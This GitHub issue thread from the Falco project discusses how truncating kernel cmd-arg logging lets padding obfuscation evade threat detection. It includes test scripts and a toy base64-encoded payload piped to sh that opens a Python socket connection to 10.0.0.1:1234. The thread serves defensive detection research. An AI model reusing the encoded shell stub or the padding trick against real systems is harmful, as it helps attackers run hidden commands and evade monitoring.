[Discussion] Robust kernel event logging for variable length strings for threat detection use cases (e.g. cmd args padding obfuscation bypasses etc) #2259

incertum · 2022-10-16T04:01:27Z

Falco enforces upper limits on variable length strings for kernel signals such as cmd args, process environment variables or file names and paths. The primary motivation is to ensure stability in terms of maximum overall event size and maximum field size.

Across tools (including Falco), there are two commonly adopted approaches to reading, for example, cmd args:

- Read each cmd arg individually and truncate it at the end according to Falco's max arg size (if applicable).
- Read all cmd args in one pass from start to end and truncate the result at the end according to Falco's max args size (if applicable).
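
To make the difference between the two approaches concrete, here is a minimal shell sketch. The limit `MAX=16` and the helper names `truncate_each` and `truncate_joined` are made up for illustration; they are not Falco's actual values or code, and byte-wise truncation via `head -c` is likewise an assumption. The sketch shows how padding placed in front of a payload pushes the payload past the limit under either approach.

```shell
#!/bin/sh
# Hypothetical limit for illustration only; not Falco's actual value.
MAX=16

# Approach 1: truncate each argument on its own, then join with spaces.
truncate_each() {
    out=""
    for arg in "$@"; do
        out="$out$(printf '%s' "$arg" | head -c "$MAX") "
    done
    printf '%s\n' "${out% }"
}

# Approach 2: join all arguments first, then truncate once at the end.
truncate_joined() {
    printf '%s\n' "$(printf '%s' "$*" | head -c "$MAX")"
}

# 32 bytes of padding followed by a stand-in payload marker.
PAD=$(head -c 32 /dev/zero | tr '\0' 'a')
truncate_each sh -c "${PAD}PAYLOAD"
truncate_joined sh -c "${PAD}PAYLOAD"
```

In both cases the logged string ends in padding and the `PAYLOAD` marker never appears, which is the essence of a padding bypass.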

The limits enforced by Falco and other tools are typically smaller than the limits enforced by the Linux kernel. Falco's current approach is battle-tested in production (with significant performance and stability benefits) and is robust for >99% of benign cmd args.

However, neither of the current approaches is robust to cmd args padding obfuscation bypasses in "command line attacks", where the payload is passed directly on the command line rather than invoked from a file or similar. This issue therefore kicks off a discussion on how such critical edge cases could be supported in future iterations of Falco (if possible and feasible at all). More details and an example are provided in the comments below.

One idea could be to feature more sophisticated variable length string logging only for the most critical threat detection use cases, such as when a string gets interpreted through the -c flag. Simply adopting the Linux kernel limits is likely not an option: they are rather high and would introduce unnecessary instability. Perhaps some sort of probabilistic sampling of the string at the beginning, middle and end, pushing 3 substrings with an upper size limit to userspace, may be worth thinking about? A slightly probabilistic approach may help reduce the likelihood of threat actors being able to reliably test bypasses against Falco (attacks often require multiple attempts because of app and system flakiness). However, any approach will have a performance impact, and the required refactor may be significant.
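
As a rough userspace illustration of the sampling idea (not a proposal for how it would look in the kernel drivers), the sketch below extracts three bounded substrings from the start, middle and end of a long string. The function name `sample_string` and its `CHUNK` parameter are hypothetical. The middle window here is deterministic; a randomized offset would be one way to add the probabilistic element mentioned above.

```shell
#!/bin/sh
# sample_string STRING CHUNK
# Print up to three CHUNK-byte substrings of STRING (start, middle, end),
# one per line. Strings of at most 3*CHUNK bytes are printed whole.
sample_string() {
    s=$1
    chunk=$2
    len=$(printf '%s' "$s" | wc -c | tr -d ' ')
    if [ "$len" -le $((3 * chunk)) ]; then
        printf '%s\n' "$s"
        return
    fi
    # 1-based byte offset at which the middle window starts.
    mid=$(( (len - chunk) / 2 + 1 ))
    printf '%s' "$s" | head -c "$chunk"; echo
    printf '%s' "$s" | tail -c "+$mid" | head -c "$chunk"; echo
    printf '%s' "$s" | tail -c "$chunk"; echo
}

sample_string "aaaaXXXXbbbb" 2
```

For the 12-byte input above with a chunk size of 2, this prints `aa`, `XX` and `bb` on separate lines, so at most 3 * CHUNK bytes would need to reach userspace regardless of the input length.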

Other logging improvement / optimization ideas that have been raised and relate to this issue:

- TOCTOU and LSM hooks: Support Linux Security Modules hook for more accurate security tracing libs#252 @LucaGuerra @loresuso
- More robust "drop+exec" (file-based) and "memfd+exec" detections: [TRACKING] "drop+exec" kernel signal correlations detections + threat modeling beyond libs#615 @loresuso @LucaGuerra @incertum
- Interpreter scripts: [FEATURE] Options available for tapping into "linux_binprm" that holds args used when loading binaries libs#621 @incertum
- File path obfuscation: Discuss about fundamental solution of detecting symlink file based bypass method #2203 @hi120ki
- Additional syscall logging: [UMBRELLA] Missing syscalls #1998 @Andreagit97 @FedeDP

Looking forward to collecting more thoughts from everyone 🙃

incertum · 2022-10-16T04:16:35Z

Exploiting applications via "command line attacks" often results in some sort of sh -c on the backend. This means the shell (bash in the example below) interprets the entirety of the passed string. The good news is that in this case the payload is logged as cmd args of the execve* syscall, preserving the original semantic meaning of the entire payload in a single log. Once the payload has been interpreted, that overall semantic meaning is typically destroyed, which often makes it more difficult to spot obvious outliers.

Consider a simple toy example (using Falco lib's sinsp-example binary for simple and fast experiments):

sudo ./libsinsp/examples/sinsp-example -b driver/bpf/probe.o -f "evt.dir=< and (evt.type=execve or evt.type=execveat)" -o "*%proc.name %proc.exepath %proc.cmdline"

[1]

/bin/bash -c "echo \"cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNv
Y2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMC4wLjEiLDEy
MzQpKScK\" | base64 --decode | sh"

{"proc.cmdline":"bash -c echo \"cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNv\nY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMC4wLjEiLDEy\nMzQpKScK\" | base64 --decode | sh","proc.exepath":"/bin/bash","proc.name":"bash"}
{"proc.cmdline":"base64 --decode","proc.exepath":"/usr/bin/base64","proc.name":"base64"}
{"proc.cmdline":"sh","proc.exepath":"/usr/bin/sh","proc.name":"sh"}
{"proc.cmdline":"python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234))","proc.exepath":"/usr/bin/python","proc.name":"python"}

[2]

Because of the Turing completeness of interpreters, there are absolutely no limits in terms of obfuscating suspicious substrings in [1] and making sure that they are not logged as part of an execve* event. One fair argument is to simply say we don't care, since there will surely be some other evidence in Falco somewhere. In practice, however, noisy environments can make it hard to reliably detect that evidence, and the explainability of what actually happened is also greatly reduced. Catching the malicious payload invocation itself is typically the preferred and fastest detection.

For simplicity, I extended the following scripts, based on this post, to make it easy to experiment with possible cmd args logging improvements.

Launch logging

sudo ./libsinsp/examples/sinsp-example -b driver/bpf/probe.o -f "evt.dir=< and (evt.type=execve or evt.type=execveat)" -o "*%proc.name %proc.exepath %proc.cmdline"

Then launch the test.sh script and examine logging outputs.

foo

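#!/bin/bash
# Run an inner bash -c (this produces its own execve event).
# Note: no positional args are forwarded to the inner shell, so "$1".."$3" expand to empty strings there.
/bin/bash -c 'echo -n "$1"; echo -n "$2"; echo -n "$3"';
# Print the byte length of the first argument received by this script.
echo -n "$1" | wc -c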

test.sh

#!/bin/bash

SIZE=1000
while [ $SIZE -lt 300000 ]
do
   SIZE_HALF=$(expr $SIZE / 2)
   echo "SIZE $SIZE, SIZE_HALF $SIZE_HALF"
   VAR="`head -c $SIZE_HALF < /dev/zero | tr '\0' 'a'`"
   VAR="$VAR`head -c $SIZE_HALF < /dev/zero | tr '\0' 'A'`"

   VAR2="`head -c $SIZE_HALF < /dev/zero | tr '\0' 'b'`"
   VAR2="$VAR2`head -c $SIZE_HALF < /dev/zero | tr '\0' 'B'`"

   VAR3="`head -c $SIZE_HALF < /dev/zero | tr '\0' 'c'`"
   VAR3="$VAR3`head -c $SIZE_HALF < /dev/zero | tr '\0' 'C'`"

   ./foo "$VAR" "$VAR2" "$VAR3"
   let SIZE="( $SIZE * 20 ) / 19"
done
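
When interpreting the results of test.sh, it may help to know the kernel-side limits on the test machine. The sketch below prints them. It assumes Linux, where the per-string limit MAX_ARG_STRLEN is 32 pages (131072 bytes with 4 KiB pages), so the later iterations of the loop above can be expected to fail with "Argument list too long" rather than produce an execve event. The variable names are illustrative only.

```shell
#!/bin/sh
# Query the limits that bound what execve* can be passed at all.
page_size=$(getconf PAGE_SIZE)
arg_max=$(getconf ARG_MAX)

# Assumption: Linux defines MAX_ARG_STRLEN as 32 * PAGE_SIZE
# (the maximum size of a single argument string).
max_arg_strlen=$((32 * page_size))

echo "PAGE_SIZE=$page_size"
echo "ARG_MAX=$arg_max (total size of args + environment)"
echo "MAX_ARG_STRLEN=$max_arg_strlen (single argument, assumed)"
```

Any limit a tool like Falco enforces sits well below these values, which is the gap a padded command line can exploit.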

incertum · 2022-12-20T01:08:10Z

This is a more advanced optimization. I think a lot of other things have to happen first before tackling this, but let's keep it on the radar.

poiana · 2023-03-20T03:58:27Z

Issues go stale after 90d of inactivity.

Mark the issue as fresh with /remove-lifecycle stale.

Stale issues rot after an additional 30d of inactivity and eventually close.

If this issue is safe to close now please do so with /close.

Provide feedback via https://github.com/falcosecurity/community.

/lifecycle stale

incertum · 2023-03-20T07:00:26Z

/remove-lifecycle stale

poiana · 2023-06-18T07:31:18Z

Issues go stale after 90d of inactivity.

Mark the issue as fresh with /remove-lifecycle stale.

Stale issues rot after an additional 30d of inactivity and eventually close.

If this issue is safe to close now please do so with /close.

Provide feedback via https://github.com/falcosecurity/community.

/lifecycle stale

poiana · 2023-07-18T07:32:07Z

Stale issues rot after 30d of inactivity.

Mark the issue as fresh with /remove-lifecycle rotten.

Rotten issues close after an additional 30d of inactivity.

If this issue is safe to close now please do so with /close.

Provide feedback via https://github.com/falcosecurity/community.

/lifecycle rotten

poiana · 2023-08-17T07:32:56Z

Rotten issues close after 30d of inactivity.

Reopen the issue with /reopen.

Mark the issue as fresh with /remove-lifecycle rotten.

Provide feedback via https://github.com/falcosecurity/community.
/close

poiana · 2023-08-17T07:32:59Z

@poiana: Closing this issue.


incertum added the kind/feature label Oct 16, 2022

incertum mentioned this issue Oct 16, 2022

update(modern_bpf): reduce the execve instrumentation time with new APIs falcosecurity/libs#648

Merged

incertum mentioned this issue Jan 27, 2023

Trigger alert whenever there is any manual command executed inside a container [approx solution via new filter fields proc.is_vpgid_leader or proc.vpgid.exepath or proc.vpgid.name] #2338

Closed

poiana added the lifecycle/stale label Mar 20, 2023

poiana removed the lifecycle/stale label Mar 20, 2023

poiana added the lifecycle/stale label Jun 18, 2023

poiana added lifecycle/rotten and removed lifecycle/stale labels Jul 18, 2023

poiana closed this as completed Aug 17, 2023
